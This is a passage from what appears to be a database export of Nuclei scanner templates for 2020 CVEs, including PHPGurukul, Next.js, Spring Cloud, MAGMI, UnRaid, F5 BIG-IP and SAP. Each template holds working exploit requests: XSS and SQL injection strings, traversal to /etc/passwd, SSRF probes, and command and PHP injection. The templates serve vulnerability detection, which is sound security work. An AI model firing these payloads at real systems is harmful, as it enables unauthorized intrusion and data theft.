cve2020,cve,hms,cms,xss,authenticated,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /hospital/hms/admin/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}&submit=&submit=\n - |\n POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220124a1449183f188b35b4f719c2326afa6646b898b1e01eba50c58b774045f986022100e740bb911aae6f4d5a6af96139596c6f0e7b0ae853d6d324a26b44037b0863c1:922c64590222798bb761d5b6d8e72950", "hash": "cbc3c32bdd75c675d34d8c85eb391fe4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308221" }, "name": "CVE-2020-5192.yaml", "content": "id: CVE-2020-5192\n\ninfo:\n name: Hospital Management System 4.0 - SQL Injection\n author: TenBird\n severity: high\n description: |\n Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0.\n reference:\n - https://www.exploit-db.com/exploits/47840\n - https://phpgurukul.com/hospital-management-system-in-php/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5192\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-5192\n cwe-id: CWE-89\n epss-score: 0.38401\n epss-percentile: 0.96871\n cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: hospital_management_system\n tags: cve,cve2020,hms,cms,sqli,authenticated,edb,phpgurukul\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /hospital/hms/doctor/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}password={{password}}&submit=&submit=\n - |\n POST /hospital/hms/doctor/search.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100916c7a42d0436fc82b9ac530b4662f02687d7d10be9fd214377e261678aa6844022100f4a16d34647bc967921196ede47cf60acaa958982be7b443d8c1a0548c515288:922c64590222798bb761d5b6d8e72950", "hash": "ed663e288b0e866d31eb916b71e64ba6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308222" }, "name": "CVE-2020-5284.yaml", "content": "id: CVE-2020-5284\n\ninfo:\n name: Next.js <9.3.2 - Local File Inclusion\n author: rootxharsh,iamnoooob,dwisiswant0\n severity: medium\n description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: This issue is fixed in version 9.3.2.\n reference:\n - https://github.com/zeit/next.js/releases/tag/v9.3.2\n - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5284\n - https://github.com/Z0fhack/Goby_POC\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2020-5284\n cwe-id: CWE-22,CWE-23\n epss-score: 0.00213\n epss-percentile: 0.58675\n cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zeit\n product: next.js\n tags: cve,cve2020,nextjs,lfi,zeit\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/_next/static/../server/pages-manifest.json\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - '\\{\"/_app\":\".*?_app\\.js\"'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cf159e65f362247e3e0a65e83c53300c9520bdf1e380765a8409fa22e623af0d02204351e223719946f992f804a11e35bf15d60a75603f57f242a0aab437fb152249:922c64590222798bb761d5b6d8e72950", "hash": "b728c7e12d59fdd156686d20a552c689", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308223" }, "name": "CVE-2020-5307.yaml", "content": "id: CVE-2020-5307\n\ninfo:\n name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection\n author: gy741\n severity: critical\n description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0.\n reference:\n - https://cinzinga.com/CVE-2020-5307-5308/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5307\n - https://www.exploit-db.com/exploits/47846\n - https://cinzinga.github.io/CVE-2020-5307-5308/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5307\n cwe-id: CWE-89\n epss-score: 0.01863\n epss-percentile: 0.87061\n cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: phpgurukul\n product: dairy_farm_shop_management_system\n tags: cve,cve2020,sqli,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /dfsms/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"add-category.php\"\n\n - type: status\n status:\n - 302\n# digest: 490a0046304402206abbdc420c025030b3ebf5d8939913814cdc09df85341ba215d904100e17fd24022033075b2aa72417041b94db8cafc9fed1f0c3129b5f4a913e928f3fbc6e8add40:922c64590222798bb761d5b6d8e72950", "hash": "bf08a1b02a008d2f8b850061cd0a964e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308224" }, "name": "CVE-2020-5405.yaml", "content": "id: CVE-2020-5405\n\ninfo:\n name: Spring Cloud Config - Local File Inclusion\n author: harshbothra_\n severity: medium\n description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability.\n reference:\n - https://pivotal.io/security/cve-2020-5405\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5405\n - https://github.com/Secxt/FINAL\n - https://github.com/pen4uin/vulnerability-research-list\n - https://github.com/sobinge/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-5405\n cwe-id: CWE-22,CWE-23\n epss-score: 0.00258\n epss-percentile: 0.64891\n cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_config\n tags: cve2020,cve,lfi,springcloud,vmware\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c059c7278507f83bffb3a509de37fca67199cdbb112b7910a686bd272d247a1b022100a8fd47401a00929300f8c6807be48adf72a995e86e7b2edcc4daf10af08cd840:922c64590222798bb761d5b6d8e72950", "hash": "730aba78980ef70761bd3889bee4017d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308225" }, "name": "CVE-2020-5410.yaml", "content": "id: CVE-2020-5410\n\ninfo:\n name: Spring Cloud Config Server - Local File Inclusion\n author: mavericknerd\n severity: high\n description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches.\n reference:\n - https://tanzu.vmware.com/security/cve-2020-5410\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5410\n - https://github.com/Live-Hack-CVE/CVE-2020-5410\n - https://github.com/tdtc7/qps\n - https://github.com/alphaSeclab/sec-daily-2020\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-5410\n cwe-id: CWE-22,CWE-23\n epss-score: 0.96876\n epss-percentile: 0.99649\n cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_config\n tags: cve,cve2020,lfi,springcloud,config,traversal,kev,vmware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203db5df7db50e8b1055bb3e76398c0b5656934012adbb9f23a1944b9a36c2754702202109a44766e5fa3aa588f6b3ace938919f8f64a947884f0db7d32f7ed22327f9:922c64590222798bb761d5b6d8e72950", "hash": "81d04f378d582fddf6f08479ada489e6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308226" }, "name": "CVE-2020-5412.yaml", "content": "id: CVE-2020-5412\n\ninfo:\n name: Spring Cloud Netflix - Server-Side Request Forgery\n author: dwisiswant0\n severity: medium\n description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability can result in unauthorized access to sensitive data or systems, leading to potential data breaches or further exploitation.\n remediation: |\n Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability.\n reference:\n - https://tanzu.vmware.com/security/cve-2020-5412\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5412\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/pen4uin/awesome-vulnerability-research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-5412\n cwe-id: CWE-610,CWE-441\n epss-score: 0.05469\n epss-percentile: 0.93009\n cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: spring_cloud_netflix\n tags: cve,cve2020,ssrf,springcloud,vmware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: header\n words:\n - \"Jelly\"\n\n - type: status\n status:\n - 200\n\n# To get crithit, try http://169.254.169.254/latest/metadata/\n# digest: 4b0a00483046022100a6d1808432aa21357bfeceffa715768a7fcae54a5d6534e9d8a555629d1604f3022100e9de25f0b1d120f4b001820ec6d8ed841562d6cf449d223eb8fc6afa81e8bcbe:922c64590222798bb761d5b6d8e72950", "hash": "1e43caac0774b6120853fe0b2e74daba", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308227" }, "name": "CVE-2020-5775.yaml", "content": "id: CVE-2020-5775\n\ninfo:\n name: Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery\n author: alph4byt3\n severity: medium\n description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, data leakage, and potential remote code execution.\n remediation: |\n Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability.\n reference:\n - https://www.tenable.com/security/research/tra-2020-49\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5775\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N\n cvss-score: 5.8\n cve-id: CVE-2020-5775\n cwe-id: CWE-918\n epss-score: 0.00194\n epss-percentile: 0.57293\n cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: instructure\n product: canvas_learning_management_service\n tags: cve,cve2020,ssrf,oast,blind,tenable,instructure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022100918e8bbee2f70a24536ea9b4b93bcdcb518ee413cb81c7ac821e994b6d6120ba02204345f63adc17a9b7cc30988b3811c511794446f3b0bd1a3796f96550a0d74c57:922c64590222798bb761d5b6d8e72950", "hash": "687aad767d903b287151f19b92725d4b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308228" }, "name": "CVE-2020-5776.yaml", "content": "id: CVE-2020-5776\n\ninfo:\n name: MAGMI - Cross-Site Request Forgery\n author: dwisiswant0\n severity: high\n description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to perform unauthorized actions on behalf of the victim user.\n remediation: |\n Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation.\n reference:\n - https://www.tenable.com/security/research/tra-2020-51\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5776\n - https://github.com/sobinge/nuclei-templates\n - https://github.com/404notf0und/CVE-Flow\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-5776\n cwe-id: CWE-352\n epss-score: 0.50353\n epss-percentile: 0.97455\n cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: magmi_project\n product: magmi\n shodan-query: http.component:\"Magento\"\n tags: cve,cve2020,magmi,magento,tenable,magmi_project\n\nhttp:\n - raw:\n - |\n POST /magmi/web/magmi_saveprofile.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n\n profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n - |\n POST /magmi/web/magmi_run.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Connection: close\n\n engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n - |\n GET /magmi/web/info.php HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"PHP Extension\"\n - \"PHP Version\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100bc2cf16817aaf1a4a28dcbcf80d5270dbe106cb819d27317b9f79a25d3ed01ad0221008c5b95bbb48cd9e491c881d690b92f104be04131ceca40463cb7f8093460f434:922c64590222798bb761d5b6d8e72950", "hash": "6935558e1d4b12e086742b2e118a9f37", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308229" }, "name": "CVE-2020-5777.yaml", "content": "id: CVE-2020-5777\n\ninfo:\n name: Magento Mass Importer <0.7.24 - Remote Auth Bypass\n author: dwisiswant0\n severity: critical\n description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Magento Mass Importer plugin.\n remediation: |\n Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability.\n reference:\n - https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5777\n - https://www.tenable.com/security/research/tra-2020-51\n - https://github.com/404notf0und/CVE-Flow\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5777\n cwe-id: CWE-287\n epss-score: 0.04038\n epss-percentile: 0.91885\n cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: magmi_project\n product: magmi\n shodan-query: http.component:\"Magento\"\n tags: cve,cve2020,plugin,tenable,magmi,magento,auth,bypass,magmi_project\n\nhttp:\n - raw:\n - |\n GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\n Host: {{Hostname}}\n Connection: close\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Too many connections\"\n\n - type: status\n status:\n - 503\n# digest: 4a0a0047304502205820aaf2c8d68c763616b3a1f2410b79857f447e47178528d8734e381ebdfa5702210083e2d7d81bc04ccc7035150e82144ebe4423dec3ae46947f57415373d7131908:922c64590222798bb761d5b6d8e72950", "hash": "1b8f2fe9c0424cabc3c67a29834bb438", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822a" }, "name": "CVE-2020-5847.yaml", "content": "id: CVE-2020-5847\n\ninfo:\n name: UnRaid <=6.80 - Remote Code Execution\n author: madrobot\n severity: critical\n description: UnRaid <=6.80 allows remote unauthenticated attackers to execute arbitrary code.\n remediation: |\n Upgrade UnRaid to a version higher than 6.80 to mitigate the vulnerability.\n reference:\n - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847\n - https://sysdream.com/news/lab/\n - https://forums.unraid.net/forum/7-announcements/\n - https://github.com/Ostorlab/KEV\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5847\n cwe-id: CWE-94,CWE-668\n epss-score: 0.97053\n epss-percentile: 0.99741\n cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: unraid\n product: unraid\n tags: cve2020,cve,rce,kev,unraid\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"b13928fbcfff659363d7c7d1ec008d56\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c9920c55bcaddbf53b6fcb8b64faa2b15937e414ee150f5d6d41a8df48012b9c02202e53c68150b40af20af58dc5ddb6ecd2e658c1072a876363cc18f781a45d9442:922c64590222798bb761d5b6d8e72950", "hash": "cda4cf1a00a3328588141462e3508583", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822b" }, "name": "CVE-2020-5902.yaml", "content": "id: CVE-2020-5902\n\ninfo:\n name: F5 BIG-IP TMUI - Remote Code Execution\n author: madrobot,dwisiswant0,ringo\n severity: critical\n description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or upgrade to a non-vulnerable version of F5 BIG-IP TMUI.\n reference:\n - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/158334/BIG-IP-TMUI-Remote-Code-Execution.html\n - http://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html\n - http://packetstormsecurity.com/files/158414/Checker-CVE-2020-5902.html\n - http://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html\n - https://badpackets.net/over-3000-f5-big-ip-endpoints-vulnerable-to-cve-2020-5902/\n - https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902\n - https://support.f5.com/csp/article/K52145254\n - https://swarm.ptsecurity.com/rce-in-f5-big-ip/\n - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/\n - https://www.kb.cert.org/vuls/id/290915\n - https://nvd.nist.gov/vuln/detail/CVE-2020-5902\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-5902\n cwe-id: CWE-22\n epss-score: 0.97563\n epss-percentile: 0.99998\n cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 8\n vendor: f5\n product: big-ip_access_policy_manager\n tags: cve,cve2020,bigip,rce,kev,packetstorm,f5\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\"\n - \"{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release\"\n - \"{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license\"\n - \"{{BaseURL}}/hsqldb%0a\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n - \"BIG-IP release ([\\\\d.]+)\"\n - \"[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}\"\n - \"HSQL Database Engine Servlet\"\n condition: or\n\n - type: status\n status:\n - 200\n\n - raw:\n - |\n POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\n Host: {{Hostname}}\n\n command=create%20cli%20alias%20private%20list%20command%20bash\n - |\n POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1\n Host: {{Hostname}}\n\n fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d\n - |\n POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\n Host: {{Hostname}}\n\n command=list%20%2Ftmp%2Fnonexistent\n - |\n POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1\n Host: {{Hostname}}\n\n command=delete%20cli%20alias%20private%20list\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"h3ll0_w0Rld\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100aaf96da5a395053ea0372436ce504a37792ef36260bedf3723f869204d02cba902210083fd967a9f70ee938de4df948e3283c15e48c9e808d5cb0cc4e2dcbf1be556a6:922c64590222798bb761d5b6d8e72950", "hash": "5987ed3eff5c5019f52949cb545d9228", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822c" }, "name": "CVE-2020-6171.yaml", "content": "id: CVE-2020-6171\n\ninfo:\n name: CLink Office 2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: |\n CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://www.deepcode.ca/index.php/2020/04/07/cve-2020-xss-in-clink-office-v2/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-6171\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-6171\n cwe-id: CWE-79\n epss-score: 0.00135\n epss-percentile: 0.48556\n cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: communilink\n product: clink_office\n tags: cve,cve2020,xss,clink-office,communilink\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009e23ab89fad66085d2ab6cb456e4c728a76f6e0356382f5a3dd513a6fd51542b0221009f4227865760ac839ec656f971b5230460f06c7e99b7e78779556b224ce7a7fd:922c64590222798bb761d5b6d8e72950", "hash": "e8cf34131e5ef66e1e50095b52586780", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30822d" }, "name": "CVE-2020-6207.yaml", "content": "id: CVE-2020-6207\n\ninfo:\n name: SAP Solution Manager 7.2 - Remote Command Execution\n author: _generic_human_\n severity: critical\n description: SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.\n remediation: |\n Apply the latest security patches provided by SAP to mitigate this vulnerability.\n reference:\n - https://launchpad.support.sap.com/#/notes/2890213\n - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305\n - 